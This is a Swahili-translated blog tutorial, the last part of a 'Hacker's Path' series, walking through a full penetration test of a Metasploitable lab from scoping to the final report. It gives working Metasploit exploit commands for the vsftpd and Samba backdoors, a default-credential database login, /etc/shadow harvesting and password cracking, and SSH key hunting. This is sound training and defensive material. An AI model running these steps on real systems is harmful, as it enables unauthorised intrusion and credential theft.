Menyu
Kuhusu Huduma Safari Fanya Kazi Nami
Maelezo ya picha: Security operations center
Usalama Mac 8, 2026 • Dakika 30 za kusoma

Toleo lililotafsiriwa: The Full Audit: A Complete Penetration Test from Start to Finish

Maelezo yaliyotafsiriwa: Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Shiriki:
Lee Foropoulos

Lee Foropoulos

Dakika 30 za kusoma

Njia ya Hacker: Mfululizo wa Sehemu 5

Sehemu ya 1: UtanguliziSehemu ya 2: Umahiri wa FlipperSehemu ya 3: Misingi ya KaliSehemu ya 4: UnyonyajiSehemu ya 5: Ukaguzi Kamili

Ulianza mfululizo huu ukijiuliza hackers wanafanya nini kweli kweli. Ulijifunza kwamba si kuhusu hoodie na maandishi ya kijani kwenye skrini. Ni utatuzi wa matatizo kwa mpangilio. Umeclone beji, umechora ramani za mitandao, umenasa handshake, na umepata shell kwenye mashine zenye udhaifu.

Sasa tunaunganisha yote pamoja. Makala hii inakuongoza kupitia mtihani kamili wa kupenya dhidi ya shabaha ya kubuni. Kila awamu, kila uamuzi, kila ugunduzi, kimeandikwa hasa kama mtaalamu angefanya.

Hali

Mteja: Initech Labs (kampuni ndogo ya teknolojia ya kubuni)

Wigo: Mtihani wa kupenya mtandao wa ndani

Lengo: Kutambua udhaifu na kuonyesha athari inayoweza kutokea kwa biashara

Shabaha yako: Mtandao wako wa maabara (Kali + Metasploitable 2 + VM nyingine yoyote uliyoweka)

Chukua kahawa yako. Hii itakuwa ya kufurahisha.

Awamu ya 1: Maandalizi ya Kabla

Kabla ya kugusa kibodi, wataalam wa kupenya wanashughulikia upande wa biashara. Ruka hii, na wewe si mtaalamu wa kupenya. Wewe ni mtu anayetenda uhalifu tu.

Simu ya Wigo

Katika kazi halisi, ungekuwa na simu na mteja kuelewa:

  • Nini kiko ndani ya wigo? Mitandao ipi, masafa ya IP, programu?
  • Nini kiko nje ya wigo? Mifumo ya uzalishaji? Huduma za wahusika wengine?
  • Dirisha la majaribio? Lini unaweza kujaribu? Masaa ya kazi tu?
  • Mawasiliano? Unawasiliana na nani kama kitu kitavunjika?
  • Malengo? Tiketi ya utiifu au uboreshaji halisi wa usalama?

Kwa Maabara Yako

Wigo: Mtandao wako wa maabara ulio peke yake tu. Nje ya wigo: Kila kitu kingine duniani. Dirisha la majaribio: Wakati wowote utakao. Lengo: Kujifunza kwa vitendo.

Sheria za Ushirikiano

Miradi halisi ina sheria zilizoandikwa. Hivi ndivyo kawaida zinavyoshughulikia:

  • Barua ya idhini - Hati iliyosainiwa inayothibitisha una ruhusa
  • Taratibu za kupandisha - Nini cha kufanya ukipata kitu muhimu
  • Ushughulikiaji wa data - Jinsi ya kushughulikia data nyeti unayokutana nayo
  • Mahitaji ya kusafisha - Ondoa zana zote na milango ya nyuma unapomaliza
  • Ratiba ya kuripoti - Ripoti ya mwisho inapaswa kuwa tayari lini?

Daima Pata Ruhusa Iliyoandikwa

Hata kwa majaribio ya "kirafiki" kwenye mtandao wa rafiki yako. Barua pepe iliyosainiwa inayosema "una ruhusa ya kujaribu mtandao wangu kuanzia TAREHE hadi TAREHE" inaweza kuwa tofauti kati ya uzoefu wa kujifunza na hatia ya jinai. Chukulia hili kwa uzito.

Awamu ya 2: Upelelezi

Wakati wa kujifunza kila kitu kuhusu shabaha. Katika mradi halisi, hii ingejumuisha OSINT (akili ya vyanzo vya wazi): utafutaji wa Google, profaili za LinkedIn, tovuti za kampuni, rekodi za DNS. Kwa maabara yetu, tunaruka moja kwa moja kwa upelelezi hai.

Hatua ya 1: Ugunduzi wa Mtandao

Swali la kwanza: Kuna nini kwenye mtandao huu?

bash# Tafuta masafa ya mtandao wako
ip a | grep inet
# Tafuta kitu kama: inet 192.168.56.100/24

# Gundua wenyeji wote walio hai
sudo nmap -sn 192.168.56.0/24 -oA discovery

# Matokeo (mfano):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

Andika kila kitu. Tengeneza kumbukumbu kama hii:

text# Initech Labs - Ugunduzi wa Mtandao
# Tarehe: 2026-03-08
# Mjaribu: Jina Lako

192.168.56.1   - Lango/Ruta
192.168.56.101 - Haijulikani (ya kuchunguza)
192.168.56.102 - Haijulikani (ya kuchunguza)

Hatua ya 2: Skani ya Bandari

Sasa tunachimba zaidi. Ni huduma zipi zinazoendesha?

bash# Skani kamili ya bandari na ugunduzi wa huduma
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# Hii inachukua muda. Kwa matokeo ya haraka wakati wa kujifunza:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Kwenye Metasploitable 2, utaona hazina:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

Wazi kiasi gani. Tuendelee kusasisha kumbukumbu zetu:

text192.168.56.101 - Seva ya Linux (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # Mlango wa nyuma unaojulikana!
  - SSH (22): OpenSSH 4.7p1      # Ya kale sana
  - Telnet (23): Hai              # Kwa nini hii ipo mwaka 2026?
  - HTTP (80): Apache 2.2.8      # Programu za wavuti za kujaribu
  - SMB (139/445): Samba 3.X     # Mgodi wa dhahabu unaowezekana
  - MySQL (3306): 5.0.51a        # Ufikiaji wa hifadhidata?
  - PostgreSQL (5432): Hai       # Hifadhidata nyingine

Hatua ya 3: Utambuzi wa Udhaifu

Wakati wa kuona ni nini kinachoweza kunyonywa kweli.

bash# Endesha skripti za udhaifu
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Angalia huduma maalum katika Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

Mlango wa nyuma wa vsftpd 2.3.4 unajitokeza mara moja. Hiyo ni shell iliyohakikishwa. Lakini mtaalamu mzuri wa kupenya hasimami kwenye ugunduzi wa kwanza. Unakumbuka kila kitu.

Chumba cha seva chenye vifaa vya mtandao vinavyomulika
Upelelezi wa kina unachora ramani ya uso mzima wa mashambulizi kabla ya exploit moja hata haijafyatuliwa. Kila bandari iliyo wazi na toleo la huduma inakuwa sehemu ya data katika tathmini yako.

Awamu ya 3: Unyonyaji

Hapa ndipo mambo yanakuwa ya kusisimua. Tuna njia nyingi zinazowezekana za kuingia. Hebu tuzifanyie kazi kwa mpangilio.

Vekta ya Shambulio 1: Mlango wa Nyuma wa FTP

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

Ugunduzi umeandikwa: Shell ya root imepatikana kupitia mlango wa nyuma wa FTP. Muda kutoka skani ya kwanza hadi kuathiriwa kamili: takriban dakika 10.

Shell ya root imepatikana kupitia mlango wa nyuma wa FTP. Muda kutoka skani ya kwanza hadi kuathiriwa kamili: takriban dakika 10.

Lakini hatusimami hapa. Tunaweza kuingia wapi tena?

Vekta ya Shambulio 2: Samba

bash# Peleka kikao cha sasa nyuma
background

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

Shell nyingine ya root kupitia vekta tofauti. Hiyo ni njia mbili huru za kuathiri kamili.

Vekta ya Shambulio 3: Programu za Wavuti

Hebu tuangalie kinachoendesha kwenye bandari 80.

bash# Orodhesha saraka za wavuti
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# Matokeo:
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

# Endesha nikto kwa ugunduzi zaidi
nikto -h http://192.168.56.101

phpMyAdmin na vithibitisho vya msingi? Tuangalie:

text# Jaribu vithibitisho vya kawaida
Username: root
Password: (tupu)

# Ufikiaji umekubaliwa!

Ufikiaji wa msimamizi wa hifadhidata bila nywila. Kutoka hapa, tunaweza kutoa data zote, kubadilisha rekodi, au kutumia operesheni za faili za MySQL kuandika web shell.

Vekta ya Shambulio 4: Vithibitisho Dhaifu vya SSH

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Vithibitisho dhaifu vinatoa ufikiaji wa SSH. Si root, lakini tutashughulikia hilo katika hatua ya baada ya unyonyaji.

Awamu ya 4: Baada ya Unyonyaji

Tuna ufikiaji. Sasa nini? Mtihani halisi wa kupenya unaonyesha athari kwa biashara. Mshambuliaji anaweza KUFANYA nini kweli na ufikiaji huu?

Uvunaji wa Vithibitisho

bash# Kutoka shell yetu ya root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

# Hifadhi kwa kuvunja nje ya mtandao
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

# Kwenye Kali, vunja
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Upelelezi wa Mtandao (Kutoka Ndani)

bash# Mitandao gani mingine mashine hii inaweza kufikia?
ifconfig
route -n
cat /etc/hosts
arp -a

# Nini kinaunganishwa kwenye mashine hii?
netstat -tulpn
ss -tulpn

# Tafuta funguo za SSH (kwa harakati za kando)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Ugunduzi wa Data Nyeti

bash# Tafuta faili za kuvutia
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

# Angalia maeneo ya kawaida ya usanidi
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

# Uhesabuji wa hifadhidata
mysql -u root -p  # Jaribu nywila tupu
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

Kupandisha Mamlaka (kutoka msfadmin)

Kumbuka kuingia kwa SSH kama msfadmin? Hebu tupandishe hadi root kwa kutumia tulichojifunza katika Sehemu ya 4.

bash# Ingia kwa SSH kama msfadmin
ssh [email protected]

# Angalia ruhusa za sudo
sudo -l
# (Matokeo yanatofautiana, lakini tuangalie vekta nyingine)

# Tafuta programu za SUID
find / -perm -4000 2>/dev/null

# Tafuta skripti zinazoweza kuandikwa zinazoendeshwa na root
cat /etc/crontab

# Pakia na endesha LinPEAS kwa ukaguzi kamili
# (Katika hali halisi, tayari imeshughulikiwa katika Sehemu ya 4)
Mtaalamu anafanya kazi kwenye dawati na zana za usalama wa mtandao
Baada ya unyonyaji inaonyesha athari halisi kwa biashara. Tofauti kati ya skani ya udhaifu na mtihani wa kupenya ni kuthibitisha mshambuliaji anaweza kufanya nini kweli akiwa na ufikiaji.

Awamu ya 5: Nyaraka na Matokeo

Mtihani hauna maana bila ripoti. Hii ndiyo inayotenganisha wataalamu na wanaoiga tu. Unahitaji kueleza ulichopata, kwa nini ni muhimu, na jinsi ya kurekebisha.

Muhtasari wa Matokeo

Hivi ndivyo tulivyopata katika mtandao wa "Initech Labs", imeandaliwa kama inavyoonekana katika ripoti halisi:

MUHIMU: Mlango wa Nyuma wa Huduma ya FTP (CVE-2011-2523)

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Utekelezaji wa msimbo wa mbali bila uthibitishaji kama root

Ushahidi: Shell kamili ya root imepatikana chini ya sekunde 60

Mapendekezo: Sasisha vsftpd mara moja hadi toleo la sasa au zima huduma ya FTP kabisa.

MUHIMU: Utekelezaji wa Msimbo wa Mbali kupitia Samba

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Utekelezaji wa msimbo wa mbali bila uthibitishaji kama root

Ushahidi: Shell kamili ya root imepatikana kupitia exploit ya usermap_script

Mapendekezo: Sasisha Samba hadi toleo la sasa. Zuia ufikiaji wa SMB kwa mifumo muhimu tu.

JUU: Ufikiaji wa MySQL Root Bila Nywila

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Kuathiriwa kamili kwa hifadhidata, wizi wa data, uwekaji wa web shell

Ushahidi: Imeingia kama root na nywila tupu kupitia phpMyAdmin

Mapendekezo: Weka nywila imara ya root. Zuia ufikiaji wa phpMyAdmin. Fikiria kuondoa phpMyAdmin kabisa.

JUU: Vithibitisho Dhaifu vya SSH

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Ufikiaji uliothibitishwa unaoongoza kwa kupandisha mamlaka

Ushahidi: msfadmin:msfadmin imethibitishwa kwa mafanikio

Mapendekezo: Tekeleza sera ya nywila imara. Tekeleza uthibitishaji wa ufunguo wa SSH. Fikiria fail2ban.

WASTANI: Huduma ya Telnet Imewashwa

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Vithibitisho vinatumwa kwa maandishi wazi

Ushahidi: Bandari 23 wazi na inakubali muunganisho

Mapendekezo: Zima Telnet. Tumia SSH kwa usimamizi wote wa mbali.

CHINI: Ukurasa wa phpinfo() Ulio Wazi

Mfumo Ulioathiriwa: 192.168.56.101

Hatari: Ufichuaji wa taarifa unasaidia mashambulizi zaidi

Ushahidi: http://192.168.56.101/phpinfo unapatikana bila uthibitishaji

Mapendekezo: Ondoa au zuia ufikiaji wa kurasa za phpinfo.

Muhtasari wa Utendaji

Hii ndiyo watendaji wanaisoma kweli. Iweke fupi, yenye athari, na bila istilahi:

Muhtasari wa Utendaji

Wakati wa mtihani wa kupenya mtandao wa ndani wa Initech Labs, timu ya usalama ilipata udhibiti kamili wa kiutawala wa seva kuu ndani ya dakika 10 tangu kuanza kwa tathmini.

Matokeo Muhimu:

10 min
Muda kutoka skani ya kwanza hadi kuathiriwa kamili kwa root kwenye seva yenye huduma ambazo hazijasasishwa.
  • Udhaifu 2 muhimu unaoruhusu kuchukua udhibiti wa mbali mara moja
  • Masuala 2 ya hatari ya juu yanayofichua hifadhidata na vithibitisho vya watumiaji
  • Matokeo mengi ya wastani na ya chini yanayoonyesha mapungufu ya kimfumo ya usalama

Hitimisho: Mshambuliaji mwenye ujuzi wa msingi anaweza kuathiri mfumo huu kikamilifu ndani ya dakika. Kurekebisha mara moja kunahitajika kwa matokeo yote muhimu na ya juu. Tathmini ya ufuatiliaji inapendekezwa baada ya marekebisho kutekelezwa.

Awamu ya 6: Usafishaji na Kufunga

Mtaalamu wa kupenya anaiacha mazingira hasa kama alivyoipata.

bash# Andika vikao vyote
msf6 > sessions -l

# Maliza vikao vyote
msf6 > sessions -K

# Kwenye shabaha (ikiwa umetengeneza faili yoyote):
rm /tmp/linpeas.sh
rm /tmp/*.txt

# Ondoa watumiaji wowote uliowatengeneza
userdel testuser

# Ondoa funguo zozote za SSH ulizoweka
rm /home/*/.ssh/authorized_keys

# Andika kila kitu ulichoondoa

Katika mradi halisi, pia ungefanya:

  • Ondoa zana zote zilizopakiwa wakati wa majaribio
  • Andika mabadiliko yoyote yaliyofanywa kwenye mazingira
  • Toa hashi/checksums za data yoyote uliyoitoa
  • Futa kwa usalama data zote za mteja baada ya kuwasilisha ripoti

Orodha Kamili ya Mbinu

Hii ni mchakato wako unaoweza kutumika tena kwa mtihani wowote wa kupenya:

Mbinu ya Mtihani wa Kupenya

  1. Maandalizi ya Kabla
    • Fafanua wigo na sheria za ushirikiano
    • Pata idhini iliyoandikwa
    • Anzisha njia za mawasiliano
    • Weka mazingira yako ya majaribio
  2. Upelelezi
    • Ugunduzi wa mtandao (uhesabuji wa wenyeji)
    • Skani ya bandari na utambuzi wa huduma
    • Skani ya udhaifu
    • Uhesabuji wa programu za wavuti
    • Andika kila kitu
  3. Unyonyaji
    • Thibitisha udhaifu (usiamini skana kipofu)
    • Nyonya udhaifu uliothibitishwa
    • Andika kila kuathiriwa kwa mafanikio
    • Nasa ushahidi (picha za skrini, kumbukumbu)
  4. Baada ya Unyonyaji
    • Hesabu mfumo ulioathiriwa
    • Vuna vithibitisho
    • Tambua data nyeti
    • Jaribu kupandisha mamlaka
    • Tafuta fursa za harakati za kando
  5. Kuripoti
    • Andika muhtasari wa utendaji (athari kwa biashara)
    • Andika matokeo yote na ushahidi
    • Toa mapendekezo ya kurekebisha
    • Jumuisha maelezo ya kiufundi kwa timu za IT
  6. Usafishaji
    • Ondoa zana na mabaki yote
    • Maliza vikao na milango ya nyuma yote
    • Andika mabadiliko yoyote ya mazingira
    • Shughulikia data ya mteja kwa usalama
Mpango wa Hatua wa Ukaguzi Kamili 0/6

Kinachofuata: Njia Yako Mbele

Umemaliza Njia ya Hacker. Umetoka "hacking ina maana gani hata" hadi kufanya mtihani kamili wa kupenya. Hiyo ni ya kuvutia kweli kweli.

Lakini hii ni mwanzo tu. Hivi ndivyo pa kwenda baadaye:

Majukwaa ya Mazoezi

  • Hack The Box - Mashine za kweli za kufanya mazoezi. Anza na "Easy" zilizostaafu.
  • TryHackMe - Njia za kujifunza zilizoongozwa. Nzuri kwa maendeleo yaliyopangwa.
  • VulnHub - VM za bure zenye udhaifu za kupakua na kufanya mazoezi ndani ya nyumba.
  • PentesterLab - Inalenga usalama wa programu za wavuti.

Vyeti (Ikiwa Unavitaka)

  • eJPT (eLearnSecurity Junior Penetration Tester) - Hatua nzuri ya kuanzia, mtihani wa vitendo
  • OSCP (Offensive Security Certified Professional) - Kiwango cha tasnia, kigumu lakini kinaheshimiwa
  • PNPT (Practical Network Penetration Tester) - Ya kisasa, ya vitendo, inajumuisha uandishi wa ripoti
  • CEH (Certified Ethical Hacker) - Tiketi kwa kazi za makampuni, chini ya vitendo

Utaalamu

  • Usalama wa Programu za Wavuti - OWASP, Burp Suite, SQL injection, XSS
  • Active Directory - Mazingira mengi ya makampuni yanategemea hii
  • Usalama wa Wingu - Kupenya AWS, Azure, GCP
  • Usalama wa Simu - Majaribio ya programu za Android/iOS
  • Red Teaming - Uigaji kamili wa adui, kimwili + kidijitali
  • Uhandisi wa Nyuma - Uchambuzi wa programu hasidi, uendelezaji wa exploit

Jenga Maabara Yako ya Nyumbani

Wataalam bora wa kupenya wana maabara za nyumbani zilizopangwa vizuri. Anza rahisi na upanue:

  • Ongeza Windows Server na Active Directory
  • Weka kidhibiti cha kikoa
  • Weka programu za wavuti zenye udhaifu (DVWA, bWAPP, WebGoat)
  • Jenga mtandao wenye sehemu nyingi
  • Ongeza HoneyAegis kuona mashambulizi kutoka mtazamo wa mlinzi

Njia ya Hacker: Imekamilika

Umefanikiwa. Sehemu zote tano, kutoka udadisi hadi uwezo.

Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Unyonyaji Sehemu ya 5: Ukaguzi Kamili

Mfululizo Umekamilika - Safari Yako

Sehemu ya 1: Ulijifunza hacking ni nini kweli na ukapata ushindi wako wa kwanza na Flipper Zero

Sehemu ya 2: Ulivijua vyote vya itifaki za Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO

Sehemu ya 3: Ulijenga maabara yako ya Kali, ukajifunza nmap, na ukanasa WiFi handshake

Sehemu ya 4: Ulivijua Metasploit, unyonyaji, kupandisha mamlaka, na pivoting

Sehemu ya 5: Uliunganisha yote kuwa mbinu kamili ya mtihani wa kupenya

Usalama si mwisho wa safari. Ni mazoezi. Zana zitabadilika, udhaifu utabadilika, lakini mbinu inabaki ile ile. Uliza maswali kuhusu kila kitu. Andika kila kitu. Kamwe usisimame kujifunza.

Karibu upande mwingine.

  • Lee
How was this article?

Shiriki

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Usikose chapisho lolote

Pokea arifa machapisho mapya yanapochapishwa. Hakuna barua pepe inayohitajika.

Utaona bendera kwenye tovuti wakati kuna chapisho jipya, pamoja na arifa ya kivinjari ukiiruhusu.

Arifa za kivinjari tu. Hakuna taka.